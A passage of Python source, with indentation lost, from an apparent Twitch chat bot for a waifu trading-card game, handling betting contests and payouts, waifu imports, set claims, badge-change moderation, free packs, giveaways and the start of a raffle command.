"Cancelled the current prediction contest! Start a new one with !bet open.")
else:
self.message(channel,
"There was no open or in-progress prediction contest in your channel! Start a new one with !bet open.")
return
elif subcmd == "status":
# check for most recent betting
cur = db.cursor()
cur.execute(
"SELECT id, status, startTime, endTime FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
if canManageBets:
self.message(channel,
"No time prediction contests have been done in this channel yet. Use !bet open to open one.")
else:
self.message(channel, "No time prediction contests have been done in this channel yet.")
elif betRow[1] == 'cancelled':
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled. Use !bet open to open a new one.")
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest was cancelled.")
else:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [betRow[0]])
numBets = cur.fetchone()[0]
cur.execute("SELECT bet FROM placed_bets WHERE userid = %s AND betid = %s",
[tags["user-id"], betRow[0]])
placedBets = cur.fetchall()
placedBet = None if len(placedBets) == 0 else placedBets[0][0]
hasBet = placedBet is not None
if betRow[1] == 'open':
if canManageBets:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer. You have not bet yet." % numBets)
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. !bet start to close bets and start the run timer." % numBets)
else:
if hasBet:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. Your bet currently is %s" % (
numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Bets are currently open for a new contest. %d bets have been placed so far. You have not bet yet." % numBets)
elif betRow[1] == 'started':
elapsed = current_milli_time() - betRow[2]
formattedTime = formatTimeDelta(elapsed)
if canManageBets:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
elif not isBroadcaster:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results. You did not bet." % (
formattedTime, numBets))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. !bet end to end the run timer and determine results." % (
formattedTime, numBets))
else:
if hasBet:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. Your bet is %s" % (
formattedTime, numBets, formatTimeDelta(placedBet)))
else:
self.message(channel,
"Run in progress - elapsed time %s. %d bets were placed. You did not bet." % (
formattedTime, numBets))
else:
formattedTime = formatTimeDelta(betRow[3] - betRow[2])
paidOut = " and has been paid out" if betRow[1] == 'paid' else ""
if canManageBets:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s. Use !bet results to see full results or !bet open to open a new one." % (
formattedTime, numBets, paidOut))
else:
self.message(channel,
"No time prediction contest in progress. The most recent contest ended in %s with %d bets placed%s." % (
formattedTime, numBets, paidOut))
cur.close()
return
elif canManageBets and subcmd == "results":
cur = db.cursor()
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None:
self.message(channel, "No time prediction contests have been done in this channel yet.",
isWhisper)
elif betRow[1] == 'cancelled':
self.message(channel, "The most recent contest in this channel was cancelled.", isWhisper)
elif betRow[1] == 'open' or betRow[1] == 'started':
self.message(channel,
"There is a contest currently in progress in this channel, check !bet status.",
isWhisper)
else:
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
formattedTime = formatTimeDelta(resultData["result"])
messages = ["The most recent contest finished in %s." % formattedTime]
if len(resultData["winners"]) == 0:
messages[0] += " There were no bets placed."
else:
messages[0] += " Results: "
place = 0
for row in resultData["winners"]:
place += 1
formattedDelta = ("-" if row["timedelta"] < 0 else "+") + formatTimeDelta(
abs(row["timedelta"]))
formattedBet = formatTimeDelta(row["bet"])
entry = "({place}) {name} - {time} ({delta}); ".format(place=place,
name=row["name"],
time=formattedBet,
delta=formattedDelta)
if len(entry) + len(messages[-1]) > 400:
messages.append(entry)
else:
messages[-1] += entry
for message in messages:
self.message(channel, message, isWhisper)
cur.close()
return
elif subcmd == "forcereset" and canManageBets:
# change a started bet to open, preserving all current bets made
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'started':
self.message(channel, "There is no bet in progress in this channel.", isWhisper)
else:
if '#' + sender == channel:
# own channel, check limit and restriction
if restrictions[1] != 0:
self.message(channel, "This channel is banned from using self forcereset at the present time.")
return
invocation = current_milli_time()
period = invocation - int(config["betForceResetPeriod"])
cur.execute("SELECT COUNT(*), MIN(`timestamp`) FROM forceresets WHERE channel = %s AND `timestamp` > %s", [channel, period])
frData = cur.fetchone()
if frData[0] >= int(config["betForceResetLimit"]):
nextUse = int(frData[1]) + int(config["betForceResetPeriod"]) - invocation
datestring = formatTimeDelta(nextUse, False)
self.message(channel, "You are currently out of self forceresets. Your next one will be available in %s." % datestring)
return
cur.execute("INSERT INTO forceresets (channel, user, `timestamp`) VALUES(%s, %s, %s)", [channel, tags['user-id'], invocation])
cur.execute("UPDATE bets SET status = 'open', startTime = NULL WHERE id = %s",
[betRow[0]])
self.message(channel, "Reset the bet in progress in this channel to open status.",
isWhisper)
return
elif subcmd == "changetime" and canAdminBets:
# change the completion time of a completed bet
if len(args) < 2:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
ctdata = parseBetTime(args[1])
if not ctdata:
self.message(channel, "Usage: !bet changetime <time> (same format as !bet)", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s AND `status` != 'open' ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] != 'completed':
self.message(channel, "There is no just-completed bet in this channel.", isWhisper)
else:
cur.execute("UPDATE bets SET endTime = startTime + %s WHERE id = %s",
[ctdata["total"], betRow[0]])
self.message(channel,
"Successfully changed end time to: {h}h {min}min {s}s {ms}ms".format(
h=ctdata["hours"],
min=ctdata["minutes"],
s=ctdata["seconds"],
ms=ctdata["ms"]),
isWhisper)
return
elif subcmd == "forceenter" and canAdminBets:
if isMarathonChannel:
self.message(channel, "No forceenters allowed in the marathon channel.", isWhisper)
return
# enter another user into a bet
if len(args) < 3:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
tdata = parseBetTime(args[2])
if not tdata:
self.message(channel, "Usage: !bet forceenter <username> <time>", isWhisper)
return
enteruser = args[1].strip().lower()
if enteruser == sender:
self.message(channel, "You can't force-enter your own time, pls.", isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT id, status FROM bets WHERE channel = %s ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or betRow[1] not in ("open", "started"):
self.message(channel,
"There is not a bet in this channel that is eligible for force-entries.",
isWhisper)
else:
# check username
cur.execute("SELECT id FROM users WHERE name = %s", [enteruser])
enteridrow = cur.fetchone()
if enteridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
enterid = int(enteridrow[0])
cur.execute(
"REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[betRow[0], enterid, tdata["total"], current_milli_time()])
self.message(channel,
"Successfully entered {user}'s bet: {h}h {min}min {s}s {ms}ms".format(
h=tdata["hours"],
min=tdata["minutes"],
s=tdata["seconds"],
ms=tdata["ms"],
user=enteruser),
isWhisper)
return
elif subcmd == "payout" and canAdminBets:
# pay out most recent bet in this channel
cur = db.cursor()
cur.execute("SELECT COALESCE(MAX(paidAt), 0) FROM bets WHERE channel = %s LIMIT 1", [channel])
lastPayout = cur.fetchone()[0]
currTime = current_milli_time()
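                        # 79,200,000 ms = 22 hours between payouts in the same channel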
if lastPayout > currTime - 79200000 and not isMarathonChannel:
datestring = formatTimeDelta(lastPayout + 79200000 - currTime, False)
self.message(channel, "Bet payout may be used again in this channel in %s." % datestring,
isWhisper)
cur.close()
return
cur.execute(
"SELECT id, status, endTime FROM bets WHERE channel = %s AND status IN('completed', 'paid', 'cancelled') ORDER BY id DESC LIMIT 1",
[channel])
betRow = cur.fetchone()
if betRow is None or (betRow[1] != 'paid' and betRow[1] != 'completed'):
self.message(channel,
"There is no pending time prediction contest to be paid out for this channel.",
isWhisper)
elif betRow[1] == 'paid':
self.message(channel, "The most recent contest in this channel was already paid out.",
isWhisper)
else:
# do the thing
resultData = getBetResults(betRow[0])
if resultData is None:
self.message(channel, "Error retrieving results.", isWhisper)
cur.close()
return
numEntries = len(resultData["winners"])
if numEntries < int(config["betMinimumEntriesForPayout"]):
self.message(channel, "This contest had less than %d entrants, no payout." % int(config["betMinimumEntriesForPayout"]), isWhisper)
cur.close()
return
# calculate first run of prizes
minPrize = int(config["betMinPrize"])
maxPrize = int(config["betMaxPrize"]) * min(1 + numEntries/10, 2)
bbReward = int(config["baseBroadcasterReward"])
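                            # runs shorter than 30 minutes (1,800,000 ms) can't win the booster prizes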
canWinBigPrizes = resultData["result"] >= 1800000
whispers = []
prizeStrings = []
place = 0
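                            # a bet within 1 second (1000 ms) of the final time wins a booster pack
                            # (within 10 ms wins the rarer 'almostExact' booster); everyone else gets pudding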
for winner in resultData["winners"]:
place += 1
if abs(winner["timedelta"]) < 1000 and canWinBigPrizes:
booster = config["sameSecondBooster"]
if abs(winner["timedelta"]) < 10:
booster = config["almostExactBooster"]
giveFreeBooster(winner["id"], booster)
msg = "You won a %s booster from the bet in %s's channel. Open it in any chat with !freepacks open %s" % (booster, channel[1:], booster)
prizeStrings.append("%s - %s pack" % (winner["name"], booster))
cur.execute("UPDATE placed_bets SET prizePack = %s WHERE betid = %s AND userid = %s",
[booster, betRow[0], winner["id"]])
else:
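                                # base pudding scales linearly from maxPrize (1st place) down to minPrize (last);
                                # the portion above minPrize is cut by 1.4x for the bottom half of the field,
                                # then the bonus/penalty multipliers below apply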
pudding = minPrize + (maxPrize - minPrize) * (numEntries - place) / (numEntries - 1) / (1.4 if place > numEntries / 2 else 1)
if place == 1:
pudding *= 1.3
if isMarathonChannel and booleanConfig("marathonBetBoost"):
pudding *= 1.5
if canWinBigPrizes and abs(winner["timedelta"]) < resultData["result"] / 120:
pudding *= 1.5
if winner["bet"] < resultData["result"] / 2 or winner["bet"] > resultData["result"] * 2:
pudding *= 0.5
pudding = round(pudding)
addPudding(winner["id"], pudding)
msg = "You won %d pudding from the bet in %s's channel. Check and spend it with !pudding" % (pudding, channel[1:])
prizeStrings.append("%s - %d pudding" % (winner["name"], pudding))
cur.execute("UPDATE placed_bets SET prizePudding = %s WHERE betid = %s AND userid = %s",
[pudding, betRow[0], winner["id"]])
whispers.append(('#' + winner["name"], msg))
# broadcaster prize
                    # broadcaster reward: run hours (minimum 1) * baseBroadcasterReward, capped at maxBroadcasterReward, rounded to a whole pudding
runHours = resultData["result"] / 3600000.0
bcPrize = round(min(max(runHours, 1) * bbReward, int(config["maxBroadcasterReward"])))
capped = False
if not isMarathonChannel:
cur.execute("SELECT COALESCE(SUM(paidBroadcaster), 0) FROM bets WHERE status='paid' AND SUBSTRING(FROM_UNIXTIME(startTime/1000),1,7)=SUBSTRING(NOW(),1,7) AND channel = %s", [channel])
puddingMonth = cur.fetchone()[0] or 0
if puddingMonth + bcPrize > int(config["maxMonthlyBCReward"]):
bcPrize = int(config["maxMonthlyBCReward"]) - puddingMonth
capped = True
prizeStrings.append("%s (broadcaster) - %d pudding%s" % (channel[1:], bcPrize, " (monthly cap reached)" if capped else ""))
whispers.append((channel, "You were rewarded %d pudding%s for running your recent bet. Check and spend it with !pudding" % (bcPrize, " (monthly cap reached)" if capped else "")))
# skip using addPudding to save a database lookup
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE name = %s", [bcPrize, channel[1:]])
                    # start the cooldown for the next payout at max(endTime, lastPayout + 22h), clamped to no later than now
payoutTime = min(max(betRow[2], lastPayout + 79200000), current_milli_time())
cur.execute(
"UPDATE bets SET status = 'paid', paidBroadcaster = %s, paidAt = %s WHERE id = %s",
[bcPrize, payoutTime, betRow[0]])
messages = ["Paid out the following prizes: "]
first = True
for prize in prizeStrings:
msg = prize if first else "; " + prize
if len(messages[-1] + msg) > 400:
messages.append(prize)
else:
messages[-1] += msg
first = False
for message in messages:
self.message(channel, message, isWhisper)
# alert each person individually as well
# sent after the messages to the channel itself deliberately
for whisper in whispers:
self.message(whisper[0], whisper[1], True)
cur.close()
return
else:
self.message(channel,
"Usage: !bet <time> OR !bet status OR (as channel owner) !bet open OR !bet start OR !bet end OR !bet cancel OR !bet results",
isWhisper)
return
if command == "import" and sender in superadmins:
if len(args) != 1:
self.message(channel, "Usage: !import url", isWhisper)
return
url = args[0]
if "pastebin.com" in url and "/raw/" not in url:
url = url.replace("pastebin.com/", "pastebin.com/raw/")
try:
                r = requests.get(url, timeout=10)  # arbitrary 10s timeout so a dead paste host can't hang the bot
data = r.text.splitlines()
lineno = 0
errorlines = []
addwaifus = []
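                # Every non-empty line must match waifu_regex, which captures at least
                # the named groups "name", "link", "rarity" and "series" consumed below.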
for line in data:
lineno += 1
if not line.strip():
continue
match = waifu_regex.fullmatch(line.strip())
if match:
addwaifus.append(match.groupdict())
else:
errorlines.append(lineno)
if len(errorlines) > 0:
self.message(channel,
"Error processing waifu data from lines: %s. Please fix formatting and try again." % ", ".join(
str(lineno) for lineno in errorlines), isWhisper)
return
else:
cur = db.cursor()
cur.executemany("INSERT INTO waifus (name, image, base_rarity, series) VALUES(%s, %s, %s, %s)",
[(waifu["name"], waifu["link"], int(waifu["rarity"]), waifu["series"].strip())
for waifu in addwaifus])
cur.close()
self.message(channel, "Successfully added %d waifus to the database." % len(addwaifus),
isWhisper)
return
except Exception:
self.message(channel, "Error loading waifu data.", isWhisper)
logger.error("Error importing waifus: %s", str(sys.exc_info()))
return
if command == "sets" or command == "set":
if len(args) == 0:
self.message(channel,
"Available sets: %s/sets?user=%s . !sets claim to claim all sets you are eligible for." % (
config["siteHost"], sender.lower()), isWhisper)
return
subcmd = args[0].lower()
if subcmd == "claim":
with db.cursor(pymysql.cursors.DictCursor) as cur:
claimable = 0
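                    # Sets the user can claim: flagged claimable, not yet claimed by them,
                    # and not missing any card (the NOT IN subquery lists sets that still
                    # contain at least one card the user doesn't own).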
cur.execute("SELECT sets.* FROM sets LEFT JOIN sets_claimed ON (sets.id=sets_claimed.setid AND sets_claimed.userid = %s) WHERE sets.claimable = 1 AND sets_claimed.userid IS NULL AND id NOT IN(SELECT DISTINCT setID FROM set_cards LEFT JOIN cards ON (set_cards.cardID=cards.waifuid AND cards.userid=%s) WHERE cards.userid IS NULL)", [tags['user-id']]*2)
for row in cur.fetchall():
claimable += 1
if row["lastClaimTime"] is not None:
cooldown = row["lastClaimTime"] + int(config["setCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
# on cooldown
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Could not claim the set %s as it is on cooldown, try again in %s" % (row["name"], datestring), isWhisper)
continue
# calculate rewards
rPts = row["rewardPoints"]
rPud = row["rewardPudding"]
first = False
badgeid = row["badgeid"]
if row["firstClaimer"] is None:
first = True
rPts *= 2
rPud *= 2
badgeid = addBadge(row["name"], config["setBadgeDescription"], config["setBadgeDefaultImage"])
# give rewards
addPoints(tags['user-id'], rPts)
addPudding(tags['user-id'], rPud)
giveBadge(tags['user-id'], badgeid)
claimTime = current_milli_time()
# record everything
scValues = [row["id"], tags['user-id'], rPts, rPud, claimTime]
cur.execute("INSERT INTO sets_claimed (setid, userid, rewardPoints, rewardPudding, timestamp) VALUES(%s, %s, %s, %s, %s)", scValues)
firstClaimer = tags['user-id'] if first else row["firstClaimer"]
cur.execute("UPDATE sets SET firstClaimer = %s, lastClaimTime = %s, badgeid = %s WHERE id = %s", [firstClaimer, claimTime, badgeid, row["id"]])
# let them know what happened
if rPts > 0 and rPud > 0:
reward = "%d points and %d pudding" % (rPts, rPud)
elif rPts > 0:
reward = "%d points" % rPts
else:
reward = "%d pudding" % rPud
msgArgs = (row["name"], " (first claim!)" if first else "", tags['display-name'], reward)
self.message(channel, "Successfully claimed the set %s%s and rewarded %s with %s!" % msgArgs, isWhisper)
# send alert
cur.execute("SELECT waifus.name FROM set_cards INNER JOIN waifus ON set_cards.cardID = waifus.id WHERE setID = %s", [row["id"]])
cards = [sc["name"] for sc in cur.fetchall()]
threading.Thread(target=sendSetAlert,
args=(channel, tags["display-name"], row["name"], cards, reward, first)).start()
if claimable == 0:
self.message(channel, "You do not have any completed sets that are available to be claimed. !sets to check progress.", isWhisper)
return
elif subcmd == "checkid":
if len(args) == 1:
self.message(channel, "Usage: !sets checkid <set name>", isWhisper)
return
checkname = " ".join(args[1:])
with db.cursor() as cur:
cur.execute("SELECT id, name FROM sets WHERE name = %s", checkname)
setData = cur.fetchone()
if setData is None:
self.message(channel, "Could not find that set name in the database.", isWhisper)
else:
self.message(channel, "Set %s's ID is %d." % (setData[1], setData[0]), isWhisper)
return
else:
self.message(channel, "Usage: !sets OR !sets claim OR !sets checkid <set name>", isWhisper)
return
if command == "setbadge":
canManageImages = sender in superadmins
if len(args) < 1:
if canManageImages:
self.message(channel, "Usage: !setbadge change / queue / check / accept / reject", isWhisper)
else:
self.message(channel, "Usage: !setbadge change / list / cancel", isWhisper)
return
subcmd = args[0].lower()
if subcmd in ["change", "request"]:
if len(args) < 3:
self.message(channel, "Usage: !setbadge change <id> <link>", isWhisper)
return
with db.cursor(pymysql.cursors.DictCursor) as cur:
cur.execute("SELECT id, name, firstClaimer, badgeid FROM sets WHERE id = %s", args[1])
setData = cur.fetchone()
if setData is None:
self.message(channel, "Invalid set ID.", isWhisper)
return
if setData["firstClaimer"] is None or int(setData["firstClaimer"]) != int(tags['user-id']):
self.message(channel, "You aren't the first claimer of %s!" % setData["name"], isWhisper)
return
if canManageImages:
# automatically do the change
try:
hostedURL = processBadgeURL(args[2])
except Exception as ex:
self.message(channel, "Could not process image. %s" % str(ex), isWhisper)
return
cur.execute("UPDATE badges SET image = %s WHERE id = %s", [hostedURL, setData["badgeid"]])
# log the change for posterity
insertArgs = [tags['user-id'], setData["id"], args[2], tags['user-id'], current_milli_time()]
cur.execute("INSERT INTO setbadge_requests (requesterid, setid, image, state, moderatorid, created) VALUES(%s, %s, %s, 'auto_accepted', %s, %s)", insertArgs)
self.message(channel, "Set badge change processed successfully.", isWhisper)
return
else:
cur.execute("SELECT COALESCE(MAX(created), 0) AS lastReq FROM setbadge_requests WHERE state = 'accepted' AND setid = %s", [setData["id"]])
lastRequest = cur.fetchone()["lastReq"]
cooldown = lastRequest + int(config["imageChangeCooldownDays"])*86400000 - current_milli_time()
if cooldown > 0:
datestring = formatTimeDelta(cooldown, False)
self.message(channel, "Sorry, that set has had its badge changed too recently. Please try again in %s" % datestring, isWhisper)
return
try:
validateBadgeURL(args[2])
except ValueError as ex:
self.message(channel, "Invalid link specified. %s" % str(ex), isWhisper)
return
except Exception:
self.message(channel, "There was an unknown problem with the link you specified. Please try again later.", isWhisper)
return
# cancel any old pending requests for this set
cur.execute("UPDATE setbadge_requests SET state = 'cancelled', updated = %s WHERE setid = %s AND state = 'pending'", [current_milli_time(), setData["id"]])
# record a new request
insertArgs = [tags['user-id'], setData["id"], args[2], current_milli_time()]
cur.execute("INSERT INTO setbadge_requests (requesterid, setid, image, state, created) VALUES(%s, %s, %s, 'pending', %s)", insertArgs)
# notify the discordhook of the new request
discordArgs = {"user": tags['display-name'], "setid": setData["id"], "name": setData["name"], "image": args[2]}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} requested a set badge change for {name} to <{image}>!\nUse `!setbadge check {setid}` in any chat to check it.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Your request has been placed. You will be notified when bot staff accept or decline it.", isWhisper)
return
elif subcmd == "list":
with db.cursor() as cur:
cur.execute("SELECT sets.id, sets.name FROM setbadge_requests sr JOIN sets ON sr.setid=sets.id WHERE sr.requesterid = %s AND sr.state = 'pending'", [tags['user-id']])
reqs = cur.fetchall()
if len(reqs) == 0:
self.message(channel, "You don't have any pending set badge change requests.", isWhisper)
else:
reqList = ", ".join(["[%d] %s" % (req[0], req[1]) for req in reqs])
self.message(channel, "%s, you have pending set badge change requests for: %s." % (tags['display-name'], reqList), isWhisper)
return
elif subcmd == "cancel":
if len(args) < 2:
self.message(channel, "Usage: !setbadge cancel <id>", isWhisper)
return
with db.cursor() as cur:
cur.execute("UPDATE setbadge_requests SET state = 'cancelled', updated = %s WHERE setid = %s AND state = 'pending'", [current_milli_time(), args[1]])
if cur.rowcount > 0:
# send discord notif
cur.execute("SELECT name FROM sets WHERE id = %s", [args[1]])
setName = cur.fetchone()[0]
discordArgs = {"user": tags['display-name'], "id": args[1], "name": setName}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their badge change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your badge change request for [%d] %s." % (args[1], setName), isWhisper)
else:
self.message(channel, "You didn't have a pending badge change request for that set.", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT setid FROM setbadge_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for set badge changes: %s. !setbadge check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "accept", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !setbadge %s <set id>" % subcmd, isWhisper)
return
try:
setid = int(args[1])
except ValueError:
self.message(channel, "Usage: !setbadge %s <set id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT sr.id, sr.image, users.id, users.name, sets.id, sets.name, sets.badgeid FROM setbadge_requests sr"
+ " JOIN sets ON sr.setid = sets.id"
+ " JOIN users ON sr.requesterid = users.id"
+ " WHERE sr.setid = %s AND sr.state = 'pending'", [setid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that set.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[3], "setid": request[4], "name": request[5], "image": request[1]}
self.message(channel, ("{user} requested {name}'s set badge image to be changed to {image} ." +
" You can accept this request with !setbadge accept {setid}" +
" or deny it with !setbadge reject {setid} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE setbadge_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your badge change request for %s was rejected with the following reason: %s" % (request[5], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# update it
try:
hostedURL = processBadgeURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE badges SET image = %s WHERE id = %s", [hostedURL, request[6]])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE setbadge_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your set badge change request for %s was accepted." % request[5], True)
self.message(channel, "Request accepted. The new set badge for %s is %s" % (request[5], hostedURL), isWhisper)
return
if command == "debug" and sender in superadmins:
if debugMode:
updateBoth("Hyperdimension Neptunia", "Testing title updates.")
self.message(channel, "Title and game updated for testing purposes")
else:
self.message(channel, "Debug mode is off. Debug command disabled.")
return
if command == "givefreepack" and sender in superadmins:
if len(args) < 2:
self.message(channel, "Usage: !givefreepack <username> <booster name> [<amount> (default 1)]", isWhisper)
return
if len(args) >= 3:
try:
amount = int(args[2])
except ValueError:
self.message(channel, "Invalid amount specified.", isWhisper)
return
else:
amount = 1
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE name = %s", [args[0]])
userData = cur.fetchone()
if userData is None:
self.message(channel, "Invalid username specified.", isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters WHERE name = %s", [args[1]])
if cur.fetchone()[0] == 0:
self.message(channel, "Invalid booster name specified.", isWhisper)
return
giveFreeBooster(userData[0], args[1], amount)
if amount > 1:
self.message('#%s' % userData[1], "You were given %d free %s packs by an admin. Check them using !freepacks" % (amount, args[1]), True)
else:
self.message('#%s' % userData[1], "You were given a free %s pack by an admin. Open it using !freepacks open %s" % (args[1], args[1]), True)
self.message(channel, "Successfully gave %d %s packs to %s." % (amount, args[1], userData[1]), isWhisper)
return
if command == "nepcord":
self.message(channel,
"To join the discussion in the official Waifu TCG Discord Channel, go to %s/discord" %
config["siteHost"], isWhisper=isWhisper)
return
if command == "giveaway":
if booleanConfig("marathonOnlyGiveaway") and not isMarathonChannel:
return
cur = db.cursor()
if len(args) == 0 or args[0].lower() == 'enter':
# check for a giveaway to enter
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
# look for our own entry already existing
cur.execute("SELECT COUNT(*) FROM giveaway_entries WHERE giveawayid = %s AND userid = %s",
[giveaway_info[0], tags['user-id']])
entry_count = cur.fetchone()[0] or 0
if entry_count != 0:
self.message(channel,
"%s -> You have already entered the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
# add an entry
cur.execute("INSERT INTO giveaway_entries (giveawayid, userid, timestamp) VALUES(%s, %s, %s)",
[giveaway_info[0], tags['user-id'], current_milli_time()])
self.message(channel,
"%s -> You have been entered into the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
if sender not in superadmins:
return
subcmd = args[0].lower()
if subcmd == 'open':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is not None and giveaway_info[1] != 'closed':
self.message(channel, "There is already an open giveaway right now.", isWhisper)
cur.close()
return
# create a new giveaway
cur.execute("INSERT INTO giveaways (opened, creator, status) VALUES(%s, %s, 'open')",
[current_milli_time(), tags['user-id']])
self.message(channel, "Started a new giveaway!", isWhisper)
cur.close()
return
if subcmd == 'close':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
cur.execute("UPDATE giveaways SET closed = %s, status = 'closed' WHERE id = %s",
[current_milli_time(), giveaway_info[0]])
self.message(channel, "Closed entries for the current giveaway!", isWhisper)
cur.close()
return
if subcmd == 'pick':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None:
self.message(channel, "There hasn't been a giveaway yet.", isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
                try:
                    num_winners = int(args[1])
                    assert num_winners > 0
                except Exception:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
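                # num_winners is interpolated directly into the LIMIT clause; that is
                # only safe because it was just validated as an int above.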
cur.execute(
"SELECT giveaway_entries.userid, users.name FROM giveaway_entries INNER JOIN users ON giveaway_entries.userid = users.id WHERE giveaway_entries.giveawayid = %s AND giveaway_entries.winner = 0 ORDER BY RAND() LIMIT " + str(
num_winners), [giveaway_info[0]])
winners = cur.fetchall()
if len(winners) != num_winners:
self.message(channel,
"There aren't enough entrants left to pick %d more winners! Try %d or fewer." % (
num_winners, len(winners)), isWhisper)
cur.close()
return
winner_ids = [row[0] for row in winners]
inTemplate = ",".join(["%s"] * len(winner_ids))
winner_names = ", ".join(row[1] for row in winners)
cur.execute(
"UPDATE giveaway_entries SET winner = 1, when_won = %s WHERE giveawayid = %s AND userid IN (" + inTemplate + ")",
[current_milli_time(), giveaway_info[0]] + winner_ids)
self.message(channel, "Picked %d winners for the giveaway: %s!" % (num_winners, winner_names),
isWhisper)
cur.close()
return
if command == "raffle":
with db.cursor() as cur:
cur.execute("SELECT id, status, ticket_price, max_tickets FROM raffles ORDER BY id DESC LIMIT 1")
raffle_info = cur.fetchone()
if len(args) == 0:
# check for info
if raffle_info is None or raffle_info[1] == 'done':
self.message(channel, "No raffle is open at this time.", isWhisper)
return
else:
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
if raffle_info[1] == 'open':
if my_tickets is None:
self.message(channel,
"There is a raffle currently open. You can buy up to %d tickets for %d points each using !raffle buy <amount>. You don't have any tickets right now." % (
raffle_info[3], raffle_info[2]), isWhisper)
elif my_tickets[0] < raffle_info[3]:
self.message(channel,
"There is a raffle currently open. You have bought %d tickets so far. You can buy up to %d more for %d points each using !raffle buy <amount>." % (
my_tickets[0], raffle_info[3] - my_tickets[0], raffle_info[2]),
isWhisper)
else:
self.message(channel,
